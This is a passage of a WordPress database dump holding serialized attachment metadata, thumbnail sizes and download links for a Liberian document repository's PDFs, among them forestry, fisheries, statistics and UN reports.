-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:14:\"l2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:14:\"l2-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:14:\"l2-412x450.png\";s:5:\"width\";i:412;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34604,5024,'_wp_page_template','default'),(34605,5024,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/202205066752167ldhs2007.pdf'),(34606,5024,'by','Liberia Institute of Statistics and  Geo-Information Services (LISGIS)'),(34607,5024,'year','2007'),(34608,5024,'_pods_document_cover_image','a:1:{i:0;i:5026;}'),(34609,5024,'document_cover_image','5026'),(34610,5024,'_pods_attached_document','a:1:{i:0;i:5025;}'),(34611,5024,'attached_document','5025'),(34612,5028,'_last_editor_used_jetpack','classic-editor'),(34613,5028,'_edit_lock','1663292304:38'),(34614,5028,'_edit_last','38'),(34615,5029,'_wp_attached_file','2022/09/l3.png'),(34616,5029,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:416;s:6:\"height\";i:540;s:4:\"file\";s:14:\"2022/09/l3.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"l3-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"l3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"l3-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:13:\"l3-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:14:\"l3-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:14:\"l3-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:14:\"l3-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:14:\"l3-416x450.png\";s:5:\"width\";i:416;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34617,5030,'_wp_attached_file','2022/09/202205066752167ldhs2007-1.pdf'),(34618,5028,'_wp_page_template','default'),(34619,5028,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/202205066752167ldhs2007-1.pdf'),(34620,5028,'by','IA INSTITUTE OF STATISTICS AND GEO INFORMATION SERVICES (LISGIS)'),(34621,5028,'year','2007'),(34622,5028,'_pods_document_cover_image','a:1:{i:0;i:5029;}'),(34623,5028,'document_cover_image','5029'),(34624,5028,'_pods_attached_document','a:1:{i:0;i:5030;}'),(34625,5028,'attached_document','5030'),(34628,5033,'_last_editor_used_jetpack','classic-editor'),(34629,5033,'_edit_lock','1663293364:38'),(34630,5033,'_edit_last','38'),(34631,5034,'_wp_attached_file','2022/09/images.png'),(34632,5034,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:224;s:6:\"height\";i:224;s:4:\"file\";s:18:\"2022/09/images.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"images-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"images-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34633,5035,'_wp_attached_file','2022/09/uni.png'),(34634,5035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1029;s:6:\"height\";i:587;s:4:\"file\";s:15:\"2022/09/uni.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"uni-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"uni-1024x584.png\";s:5:\"width\";i:1024;s:6:\"height\";i:584;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"uni-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"uni-768x438.png\";s:5:\"width\";i:768;s:6:\"height\";i:438;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"uni-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"uni-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"uni-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"uni-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"uni-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"uni-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"uni-600x342.png\";s:5:\"width\";i:600;s:6:\"height\";i:342;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"uni-640x587.png\";s:5:\"width\";i:640;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34635,5033,'_thumbnail_id','5035'),(34636,5033,'_wp_page_template','default'),(34637,5033,'internet','https://liberia.un.org/en'),(34638,5033,'_pods_institution_logo','a:1:{i:0;i:5034;}'),(34639,5033,'institution_logo','5034'),(34640,5037,'_last_editor_used_jetpack','classic-editor'),(34641,5037,'_edit_lock','1663324576:38'),(34642,5037,'_edit_last','38'),(34643,5038,'_wp_attached_file','2022/09/Article-page1-UN-liberia.pdf'),(34644,5039,'_wp_attached_file','2022/09/un-liberia.png'),(34645,5039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:404;s:6:\"height\";i:570;s:4:\"file\";s:22:\"2022/09/un-liberia.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"un-liberia-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"un-liberia-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"un-liberia-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"un-liberia-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"un-liberia-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"un-liberia-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:22:\"un-liberia-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:22:\"un-liberia-404x450.png\";s:5:\"width\";i:404;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34646,5037,'_wp_page_template','default'),(34647,5037,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Article-page1-UN-liberia.pdf'),(34648,5037,'by','Dr Neddy Matshalaga (International Consultant), Dr Backson Sibanda (Team Leader)'),(34649,5037,'year','2018'),(34650,5037,'_pods_document_cover_image','a:1:{i:0;i:5039;}'),(34652,5037,'_pods_attached_document','a:1:{i:0;i:5038;}'),(34658,5037,'document_cover_image','5039'),(34659,5037,'attached_document','5038'),(34660,5042,'_last_editor_used_jetpack','classic-editor'),(34661,5042,'_edit_lock','1663325056:38'),(34662,5042,'_edit_last','38'),(34663,5043,'_wp_attached_file','2022/09/FDA2.png'),(34664,5043,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:416;s:6:\"height\";i:541;s:4:\"file\";s:16:\"2022/09/FDA2.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"FDA2-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"FDA2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"FDA2-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"FDA2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"FDA2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"FDA2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"FDA2-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"FDA2-416x450.png\";s:5:\"width\";i:416;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34665,5044,'_wp_attached_file','2022/09/doc_1320_1.pdf'),(34666,5042,'_wp_page_template','default'),(34667,5042,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/doc_1320_1.pdf'),(34668,5042,'by','FDA'),(34669,5042,'year','2008'),(34670,5042,'_pods_document_cover_image','a:1:{i:0;i:5043;}'),(34671,5042,'document_cover_image','5043'),(34672,5042,'_pods_attached_document','a:1:{i:0;i:5044;}'),(34673,5042,'attached_document','5044'),(34674,5046,'_last_editor_used_jetpack','classic-editor'),(34675,5046,'_edit_lock','1663325917:38'),(34676,5046,'_edit_last','38'),(34677,5047,'_wp_attached_file','2022/09/fda-Guardline.png'),(34678,5047,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:412;s:6:\"height\";i:571;s:4:\"file\";s:25:\"2022/09/fda-Guardline.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-216x300.png\";s:5:\"width\";i:216;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"fda-Guardline-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"fda-Guardline-412x450.png\";s:5:\"width\";i:412;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34679,5048,'_wp_attached_file','2022/09/Forest_Mgmt_Plan_Guidelines_2009_20.pdf'),(34680,5046,'_wp_page_template','default'),(34681,5046,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/Forest_Mgmt_Plan_Guidelines_2009_20.pdf'),(34682,5046,'by','FDA'),(34683,5046,'year','2009-20'),(34684,5046,'_pods_document_cover_image','a:1:{i:0;i:5047;}'),(34685,5046,'document_cover_image','5047'),(34686,5046,'_pods_attached_document','a:1:{i:0;i:5048;}'),(34687,5046,'attached_document','5048'),(34688,5050,'_last_editor_used_jetpack','classic-editor'),(34689,5050,'_edit_lock','1663326698:38'),(34690,5050,'_edit_last','38'),(34691,5051,'_wp_attached_file','2022/09/FDA-FREEDOM.png'),(34692,5051,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:418;s:6:\"height\";i:540;s:4:\"file\";s:23:\"2022/09/FDA-FREEDOM.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"FDA-FREEDOM-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:23:\"FDA-FREEDOM-418x450.png\";s:5:\"width\";i:418;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34693,5052,'_wp_attached_file','2022/09/FOI_Protocols_for_FDA..._76.pdf'),(34694,5050,'_wp_page_template','default'),(34695,5050,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/FOI_Protocols_for_FDA..._76.pdf'),(34696,5050,'by','FDA'),(34697,5050,'year','September 2016'),(34698,5050,'_pods_document_cover_image','a:1:{i:0;i:5051;}'),(34699,5050,'document_cover_image','5051'),(34700,5050,'_pods_attached_document','a:1:{i:0;i:5052;}'),(34701,5050,'attached_document','5052'),(34702,5054,'_last_editor_used_jetpack','classic-editor'),(34703,5054,'_edit_lock','1663327183:38'),(34704,5054,'_edit_last','38'),(34705,5055,'_wp_attached_file','2022/09/FDA.png'),(34706,5055,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:403;s:6:\"height\";i:567;s:4:\"file\";s:15:\"2022/09/FDA.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"FDA-213x300.png\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"FDA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"FDA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"FDA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"FDA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"FDA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"FDA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"FDA-403x450.png\";s:5:\"width\";i:403;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34707,5056,'_wp_attached_file','2022/09/CODE_OF_HARVESTING_PRACTICE__2007_19.pdf'),(34708,5054,'_wp_page_template','default'),(34709,5054,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/CODE_OF_HARVESTING_PRACTICE__2007_19.pdf'),(34710,5054,'by','FDA'),(34711,5054,'year','September 10, 2007'),(34712,5054,'_pods_document_cover_image','a:1:{i:0;i:5055;}'),(34713,5054,'document_cover_image','5055'),(34714,5054,'_pods_attached_document','a:1:{i:0;i:5056;}'),(34715,5054,'attached_document','5056'),(34716,5058,'_last_editor_used_jetpack','classic-editor'),(34717,5058,'_edit_lock','1663327697:38'),(34718,5058,'_edit_last','38'),(34719,5059,'_wp_attached_file','2022/09/NaFAA.png'),(34720,5059,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:751;s:6:\"height\";i:530;s:4:\"file\";s:17:\"2022/09/NaFAA.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"NaFAA-300x212.png\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"NaFAA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"NaFAA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"NaFAA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"NaFAA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"NaFAA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"NaFAA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"NaFAA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"NaFAA-600x423.png\";s:5:\"width\";i:600;s:6:\"height\";i:423;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"NaFAA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(34721,5060,'_wp_attached_file','2022/09/GUIDELINES-FOR-FISHING-LICENSE-NEW.pdf'),(34722,5058,'_wp_page_template','default'),(34723,5058,'download_link','https://ekmsliberia.info/wp-content/uploads/2022/09/GUIDELINES-FOR-FISHING-LICENSE-NEW.pdf'),(34724,5058,'by','National Fisheries & Aquaculture Authority  (NaFAA)'),(34725,5058,'year','2022'),(34726,5058,'_pods_document_cover_image','a:1:{i:0;i:5059;}'),(34727,5058,'document_cover_image','5059'),(34728,5058,'_pods_attached_document','a:1:{i:0;i:5060;}'),(34729,5058,'attached_document','5060'),(34730,5062,'_last_editor_used_jetpack','classic-editor'),(34731,5062,'_edit_lock','1663329000:38'),(34732,5062,'_edit_last','38'),(34733,5063,'_wp_attached_file','2022/09/L-2019-20.png'),(34734,5063,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:414;s:6:\"height\";i:543;s:4:\"file\";s:21:\"2022/09/L-2019-20.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"L-2019-20-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"L-2019-20-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"L-2019-20-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"L-2019-20-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:21:\"L-2019-20-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:21:\"L-2019-20-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:21:\"L-2019-20-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:21:\"L-2019-20-414x450.png\";s:5:\"width\";i:414;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\